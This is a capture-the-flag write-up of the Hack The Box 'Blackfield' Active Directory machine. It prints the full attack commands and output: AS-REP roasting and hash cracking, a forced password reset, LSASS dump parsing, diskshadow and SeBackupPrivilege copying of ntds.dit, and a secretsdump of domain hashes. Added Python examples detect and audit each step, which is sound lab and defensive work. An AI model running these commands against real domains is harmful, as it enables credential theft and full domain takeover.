# Blackfield

`kerberoast` `SeBackUp`

* Machine name: Blackfield
* Difficulty: Hard
* OS: Windows - AD

## Enumeration

### NMAP

```
Nmap scan report for 10.10.10.192
Host is up (0.031s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-14 20:15:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### SMB

```
┌──(kali㉿kali)-[~/htb/black]
└─$ smbmap -H 10.10.10.192 -u '%'     

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.192:445	Name: 10.10.10.192        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	forensic                                          	NO ACCESS	Forensic / Audit share.
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	profiles$                                         	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share
```

The readable `profiles$` share gives us a list of usernames.

```
┌──(kali㉿kali)-[~/htb/black]
└─$ smbclient //10.10.10.192/profiles$  
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020
```

```
┌──(kali㉿kali)-[~/htb/black]
└─$ awk '{ print $1 }' user.txt > users.txt
```

## Initial access

```
┌──(kali㉿kali)-[~/htb/black]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile users.txt -format hashcat -outputfile hash.txt
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

┌──(kali㉿kali)-[~/htb/black]
└─$ cat hash.txt 
$krb5asrep$23$support@BLACKFIELD.LOCAL:c4e3415c5327a40f69644399ee905d2e$f65ad5c38c07ae53c0e1def2b769e73097ebf96d45d935111d249392a1b072bcd8c39830a2e5fad7b1cf5219765771e8f9f9ea1ee1b4b9b4ce5f3379062c2337d068e30d0f6df250d2e38b8283bd5cf1d4730c8c5756cfaf9760408bff9c3c50749af1f2f1bcd8bea741457a664add2e19d29a270f9c313ab68570d07381f381c77cd5a65e23c7f9edcfd120e16a0e9ec7fc450c68a5684bac9631f83b46e323030fa149cca95b6e8f952e2b7aebc8d0e603a7cdc30a56124c5ad003b8440b64c0d295da166c442f812038c7feaee44e293710e51c0256edd28cffc1e183caf53ec8af44046d76d55081edb6450963d5153adc7d
```

```
┌──(kali㉿kali)-[~/htb/black]
└─$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
{...}
$krb5asrep$23$support@BLACKFIELD.LOCAL:c4e3415c5327a40f69644399ee905d2e$f65ad5c38c07ae53c0e1def2b769e73097ebf96d45d935111d249392a1b072bcd8c39830a2e5fad7b1cf5219765771e8f9f9ea1ee1b4b9b4ce5f3379062c2337d068e30d0f6df250d2e38b8283bd5cf1d4730c8c5756cfaf9760408bff9c3c50749af1f2f1bcd8bea741457a664add2e19d29a270f9c313ab68570d07381f381c77cd5a65e23c7f9edcfd120e16a0e9ec7fc450c68a5684bac9631f83b46e323030fa149cca95b6e8f952e2b7aebc8d0e603a7cdc30a56124c5ad003b8440b64c0d295da166c442f812038c7feaee44e293710e51c0256edd28cffc1e183caf53ec8af44046d76d55081edb6450963d5153adc7d:#00^BlackKnight
```

`support:#00^BlackKnight`
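The AS-REP roast above only works because the `support` account has Kerberos pre-authentication disabled, and it cracks quickly because the ticket is RC4-HMAC (etype 23). The following Python is an added example, not part of the original writeup: it audits constructed account records for the `DONT_REQ_PREAUTH` bit of `userAccountControl` (the bit values are the documented Windows ones; the account records themselves are made up to resemble the box) and parses the hashcat mode 18200 line format so the etype is visible. The fix on the defender side is to clear that flag and, where possible, remove RC4 from the allowed encryption types.

```python
"""Audit which accounts are exposed to AS-REP roasting.

Added example, not part of the original writeup. The GetNPUsers step only
yields a crackable blob for enabled accounts whose userAccountControl has the
DONT_REQ_PREAUTH bit set. Flag values are the documented UAC bit values; the
account records are constructed to resemble the box.
"""
import re

# userAccountControl bits (documented values from the Windows LDAP schema)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000

# Constructed sample of sAMAccountName / userAccountControl pairs as an LDAP
# query against the domain would return them.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "support", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "audit2020", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_backup", "userAccountControl": NORMAL_ACCOUNT},
    # a disabled account cannot obtain tickets, so it is not exposed even with the flag
    {"sAMAccountName": "Guest", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH},
]


def roastable_accounts(accounts):
    """Return enabled accounts that do not require Kerberos pre-authentication."""
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if a["userAccountControl"] & DONT_REQ_PREAUTH
        and not a["userAccountControl"] & ACCOUNTDISABLE
    )


# hashcat mode 18200 line layout: $krb5asrep$<etype>$<user>@<realm>:<checksum>$<enc-part>
HASH_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<encpart>[0-9a-f]+)$"
)


def parse_asrep_line(line):
    """Split one hashcat krb5asrep line into its fields; etype 23 means RC4-HMAC."""
    m = HASH_RE.match(line.strip())
    if m is None:
        raise ValueError("not a krb5asrep hash line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["rc4"] = fields["etype"] == 23
    return fields


if __name__ == "__main__":
    print("accounts without pre-auth:", roastable_accounts(SAMPLE_ACCOUNTS))
    # constructed line with shortened hex fields, same layout as the real one above
    sample = "$krb5asrep$23$support@BLACKFIELD.LOCAL:" + "c4" * 16 + "$" + "f6" * 8
    print(parse_asrep_line(sample))
```

In a real audit the `SAMPLE_ACCOUNTS` list would come from an LDAP query for `userAccountControl`; an account that is flagged and enabled is exactly what the attack step above looks for, and an etype of 17 or 18 in the hash line indicates AES, which is far slower to crack than RC4.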

```
┌──(kali㉿kali)-[~/htb/black]
└─$ nxc smb 10.10.10.192 -u support -p '#00^BlackKnight' --rid-brute          
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192    445    DC01             498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.192    445    DC01             500: BLACKFIELD\Administrator (SidTypeUser)
SMB         10.10.10.192    445    DC01             501: BLACKFIELD\Guest (SidTypeUser)
{...}

┌──(kali㉿kali)-[~/htb/black]
└─$ cat users2.txt
lydericlefebvre
support
svc_backup
administrator
audit2020
```

We built a new list of users from the RID brute-force results.

We continue the analysis with BloodHound.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2Fv8kPGURBXATqEIHb3ntZ%2F406be8fd5e029bcfb53c50183959c551.png?alt=media&#x26;token=9c913809-5f5e-41c4-99b0-4ffb70a76311" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~/htb/black]
└─$ nxc ldap 10.10.10.192 -u support -p '#00^BlackKnight'  --bloodhound --collection All --dns-server 10.10.10.192
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
LDAP        10.10.10.192    389    DC01             Resolved collection methods: psremote, group, container, objectprops, acl, dcom, rdp, session, trusts, localadmin
LDAP        10.10.10.192    389    DC01             Done in 00M 06S
LDAP        10.10.10.192    389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.10.192_2024-11-14_084727_bloodhound.zip

```

```
┌──(kali㉿kali)-[~/htb/black]
└─$ net rpc password 'audit2020' 'aze123!' -U BLACKFIELD.local/support -S '10.10.10.192'  
Password for [BLACKFIELD.LOCAL\support]:

┌──(kali㉿kali)-[~/htb/black]
└─$ nxc smb 10.10.10.192 -u audit2020 -p 'aze123!' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:aze123! 
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share
```
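Resetting another account's password, as done above with `net rpc password`, is recorded on the domain controller as Security event 4724 (a user changing their own password produces 4723 instead). The Python below is an added example, not part of the original writeup: it flags 4724 events whose actor is outside a hypothetical allow-list of accounts expected to reset passwords, and pairs each such reset with a later 4624 logon of the target account, which is the pattern of an attacker changing a password and immediately using it. The events are constructed using the Security log's field names.

```python
"""Flag password resets performed by unexpected accounts (added example).

Not part of the original writeup. Security event 4724 is logged when one
account resets another account's password; 4723 is a self-service change.
Events are constructed in the Security log's field names; the allow-list of
expected resetters is hypothetical.
"""
from datetime import datetime, timedelta

EXPECTED_RESETTERS = {"administrator", "helpdesk01"}  # hypothetical allow-list, lower-case

# Constructed events: a reset by "support", a legitimate reset by Administrator,
# a self-service change (4723), an account-change event (4738) and a later
# network logon of the reset account.
SAMPLE_EVENTS = [
    {"EventID": 4724, "TimeCreated": "2024-11-14T20:31:05Z",
     "SubjectUserName": "support", "SubjectDomainName": "BLACKFIELD",
     "TargetUserName": "audit2020", "TargetDomainName": "BLACKFIELD"},
    {"EventID": 4724, "TimeCreated": "2024-11-14T09:02:44Z",
     "SubjectUserName": "Administrator", "SubjectDomainName": "BLACKFIELD",
     "TargetUserName": "AAlleni", "TargetDomainName": "BLACKFIELD"},
    {"EventID": 4723, "TimeCreated": "2024-11-14T10:15:00Z",
     "SubjectUserName": "ABekesz", "SubjectDomainName": "BLACKFIELD",
     "TargetUserName": "ABekesz", "TargetDomainName": "BLACKFIELD"},
    {"EventID": 4738, "TimeCreated": "2024-11-14T20:31:05Z",
     "SubjectUserName": "support", "SubjectDomainName": "BLACKFIELD",
     "TargetUserName": "audit2020", "TargetDomainName": "BLACKFIELD"},
    {"EventID": 4624, "TimeCreated": "2024-11-14T20:33:40Z", "LogonType": 3,
     "TargetUserName": "audit2020", "TargetDomainName": "BLACKFIELD",
     "IpAddress": "10.10.14.5"},
]


def _ts(value):
    """Parse the ISO-8601 timestamps used in the sample (Z suffix tolerated)."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def suspicious_resets(events, allowed=EXPECTED_RESETTERS):
    """Return 4724 events whose actor is not an allow-listed resetter."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4724:
            continue
        actor = ev["SubjectUserName"]
        if actor.lower() in allowed:
            continue
        hits.append({
            "time": ev["TimeCreated"],
            "actor": f"{ev['SubjectDomainName']}\\{actor}",
            "target": f"{ev['TargetDomainName']}\\{ev['TargetUserName']}",
        })
    return hits


def reset_then_logon(events, window=timedelta(hours=1)):
    """Pair each suspicious reset with a 4624 logon of the target inside the window."""
    pairs = []
    logons = [e for e in events if e.get("EventID") == 4624]
    for hit in suspicious_resets(events):
        t0 = _ts(hit["time"])
        target = hit["target"].split("\\")[-1].lower()
        for lg in logons:
            t1 = _ts(lg["TimeCreated"])
            if lg["TargetUserName"].lower() == target and t0 <= t1 <= t0 + window:
                pairs.append({"reset": hit, "logon_from": lg.get("IpAddress", "-"),
                              "at": lg["TimeCreated"]})
    return pairs


if __name__ == "__main__":
    for hit in suspicious_resets(SAMPLE_EVENTS):
        print("unexpected reset:", hit)
    for pair in reset_then_logon(SAMPLE_EVENTS):
        print("reset followed by logon:", pair)
```

The underlying permission in this box is an ACL right on the `audit2020` object; the reset event does not tell you that, so the 4724 alert is the signal to go and review who holds write rights on the target user.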

```
┌──(kali㉿kali)-[~/htb/black]
└─$ smbclient //10.10.10.192/forensic -U 'audit2020'                    
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

		5102079 blocks of size 4096. 1687406 blocks available
smb: \> prompt off
smb: \> recurse
smb: \> mget *
{...}
```

```
┌──(kali㉿kali)-[~/htb/black]
└─$ cd memory_analysis
┌──(kali㉿kali)-[~/htb/black]
└─$ unzip lsass.zip

┌──(kali㉿kali)-[~/htb/black/memory_analysis]
└─$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
{...}
```

We recover the NT hash of `svc_backup` from the LSASS dump and can log in with it.

## Privilege escalation

The `svc_backup` account holds the SeBackupPrivilege right.

```
┌──(kali㉿kali)-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit

┌──(kali㉿kali)-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ unix2dos cmd
unix2dos: converting file cmd to DOS format...
```

```
*Evil-WinRM* PS C:\windows\temp> upload cmd
                                        
Info: Uploading /home/kali/htb/black/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/cmd to C:\windows\temp\cmd
                                        
Data: 120 bytes of 120 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> diskshadow /s C:\Windows\Temp\cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  11/14/2024 3:46:10 PM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {4cd00a7c-d93a-4cb4-800a-7e4f1bd678b6} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {11db02fe-b78d-48e5-b93f-807621eab922} set as environment variable.

Querying all shadow copies with the shadow copy set ID {11db02fe-b78d-48e5-b93f-807621eab922}

	* Shadow copy ID = {4cd00a7c-d93a-4cb4-800a-7e4f1bd678b6}		%temp%
		- Shadow copy set: {11db02fe-b78d-48e5-b93f-807621eab922}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 11/14/2024 3:46:11 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: DC01.BLACKFIELD.local
		- Service machine: DC01.BLACKFIELD.local
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% h:
-> %temp% = {4cd00a7c-d93a-4cb4-800a-7e4f1bd678b6}
The shadow copy was successfully exposed as h:\.
-> exit
```
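Two Security-log events on the domain controller cover the diskshadow step above: 4672 ("Special privileges assigned to new logon") lists the privileges granted to a session, SeBackupPrivilege among them, and 4688 records process creation, including `diskshadow.exe` started with a script file via `/s`. The Python below is an added example, not part of the original writeup: it correlates the two by `SubjectLogonId`, so a backup-capable session that launches a scripted shadow-copy tool stands out. The events are constructed and the allow-list of accounts expected to use the privilege is hypothetical.

```python
"""Spot backup-privilege abuse on a domain controller (added example).

Not part of the original writeup. Event 4672 lists the privileges granted at
logon; event 4688 records process creation (command-line auditing must be
enabled for CommandLine to be populated). Joining them on SubjectLogonId
shows a backup-privileged session starting diskshadow.exe with a script.
Events are constructed; the allow-list is hypothetical.
"""
import re

EXPECTED_BACKUP_LOGONS = {"dc01$", "backupsvc"}  # hypothetical accounts allowed to use SeBackupPrivilege

SAMPLE_EVENTS = [
    {"EventID": 4672, "TimeCreated": "2024-11-14T15:45:02Z", "SubjectUserName": "svc_backup",
     "SubjectDomainName": "BLACKFIELD", "SubjectLogonId": "0x4f2c1",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4688, "TimeCreated": "2024-11-14T15:46:10Z", "SubjectUserName": "svc_backup",
     "SubjectDomainName": "BLACKFIELD", "SubjectLogonId": "0x4f2c1",
     "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe",
     "CommandLine": "diskshadow /s C:\\Windows\\Temp\\cmd"},
    # scheduled backup by the expected service account: not flagged
    {"EventID": 4672, "TimeCreated": "2024-11-14T02:00:00Z", "SubjectUserName": "backupsvc",
     "SubjectDomainName": "BLACKFIELD", "SubjectLogonId": "0x3a001",
     "PrivilegeList": "SeBackupPrivilege"},
    # same session running something harmless: not a diskshadow hit
    {"EventID": 4688, "TimeCreated": "2024-11-14T15:50:00Z", "SubjectUserName": "svc_backup",
     "SubjectDomainName": "BLACKFIELD", "SubjectLogonId": "0x4f2c1",
     "NewProcessName": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /priv"},
]


def backup_privilege_logons(events, allowed=EXPECTED_BACKUP_LOGONS):
    """Map SubjectLogonId -> user for 4672 events granting SeBackupPrivilege to non-allow-listed accounts."""
    out = {}
    for ev in events:
        if ev.get("EventID") != 4672:
            continue
        privs = {p.strip() for p in ev["PrivilegeList"].split()}
        if "SeBackupPrivilege" in privs and ev["SubjectUserName"].lower() not in allowed:
            out[ev["SubjectLogonId"]] = ev["SubjectUserName"]
    return out


DISKSHADOW_RE = re.compile(r"(^|\\)diskshadow\.exe$", re.IGNORECASE)
SCRIPT_FLAG_RE = re.compile(r"(^|\s)[/-]s\b", re.IGNORECASE)


def scripted_diskshadow(events):
    """4688 events that start diskshadow.exe with a script (/s) argument."""
    return [
        ev for ev in events
        if ev.get("EventID") == 4688
        and DISKSHADOW_RE.search(ev["NewProcessName"])
        and SCRIPT_FLAG_RE.search(ev["CommandLine"])
    ]


def correlate(events):
    """Join scripted diskshadow launches to backup-privileged logons by SubjectLogonId."""
    logons = backup_privilege_logons(events)
    return [
        {"user": logons[ev["SubjectLogonId"]], "logon_id": ev["SubjectLogonId"],
         "command": ev["CommandLine"], "time": ev["TimeCreated"]}
        for ev in scripted_diskshadow(events)
        if ev["SubjectLogonId"] in logons
    ]


if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print("backup-privileged session ran scripted diskshadow:", hit)
```

Membership of the Backup Operators group (which is what grants SeBackupPrivilege here) should be reviewed as part of the same exercise; on a domain controller that group is effectively equivalent to domain admin for anyone who can read the shadow copy.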

{% embed url="https://github.com/giuliano108/SeBackupPrivilege" %}

```
*Evil-WinRM* PS C:\windows\temp> upload SeBackupPrivilegeUtils.dll
                                        
Info: Uploading /home/kali/htb/black/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll to C:\windows\temp\SeBackupPrivilegeUtils.dll
                                        
Data: 21844 bytes of 21844 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\windows\temp> upload SeBackupPrivilegeCmdLets.dll
                                        
Info: Uploading /home/kali/htb/black/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll to C:\windows\temp\SeBackupPrivilegeCmdLets.dll
                                        
Data: 16384 bytes of 16384 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\windows\temp> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\windows\temp> import-module .\SeBackupPrivilegeUtils.dll

```

```
*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite

*Evil-WinRM* PS C:\windows\temp> download NTDS
                                        
Info: Downloading C:\windows\temp\NTDS to NTDS
                                        
Info: Download successful!
*Evil-WinRM* PS C:\windows\temp> download SYSTEM
                                        
Info: Downloading C:\windows\temp\SYSTEM to SYSTEM

Info: Download successful!
```

```
┌──(kali㉿kali)-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ impacket-secretsdump -ntds NTDS -system SYSTEM LOCAL
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from NTDS 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2922a2376739265d9fb87730b7bbeec9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::

{...}
```
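The secretsdump output above uses one line per account, `domain\uid:rid:lmhash:nthash:::`. The Python below is an added example, not part of the original writeup: it parses that format and runs three checks a defender applies to such a dump, namely accounts whose NT hash is the hash of the empty password, accounts that still store a real LM hash (`aad3b435b51404eeaad3b435b51404ee` is the "no LM hash" marker), and groups of accounts sharing one NT hash, which means password reuse. The sample reuses lines from the output above plus two constructed lines (`svc_legacy` and `legacy_pc$`) to exercise the reuse and LM checks.

```python
"""Audit a secretsdump NTDS listing for credential-hygiene findings (added example).

Not part of the original writeup. Parses domain\\uid:rid:lmhash:nthash::: lines
and reports empty-password accounts, accounts still storing an LM hash, and
NT-hash reuse across accounts. The first five data lines are from the output
above; svc_legacy and legacy_pc$ are constructed.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when no LM hash exists
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

SAMPLE_DUMP = """\
[*] Reading and decrypting hashes from NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2922a2376739265d9fb87730b7bbeec9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
BLACKFIELD.local\\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
svc_legacy:1300:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
legacy_pc$:1400:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""
# svc_legacy (constructed) shares Administrator's NT hash; legacy_pc$ (constructed)
# carries a non-empty LM hash, i.e. LM storage was not disabled for it.


def parse_secretsdump(text):
    """Return one record per hash line; status lines starting with '[' are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and len(lm) == 32 and len(nt) == 32):
            continue
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def empty_password_accounts(records):
    """Accounts whose NT hash equals the empty-password hash (must be disabled)."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def lm_hash_accounts(records):
    """Accounts that still store an LM hash (trivially crackable; NoLMHash policy missing)."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


def shared_nt_hashes(records):
    """NT hashes used by more than one account, i.e. the same password on several accounts."""
    by_hash = defaultdict(list)
    for r in records:
        if r["nt"] != EMPTY_NT:
            by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    recs = parse_secretsdump(SAMPLE_DUMP)
    print("empty password:", empty_password_accounts(recs))
    print("LM hash stored:", lm_hash_accounts(recs))
    print("password reuse:", shared_nt_hashes(recs))
```

After a dump like this has left the domain controller, every listed hash is burned: the `krbtgt` password needs to be reset twice and all the other accounts once, and the `DC01$` machine account should be rotated as well.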

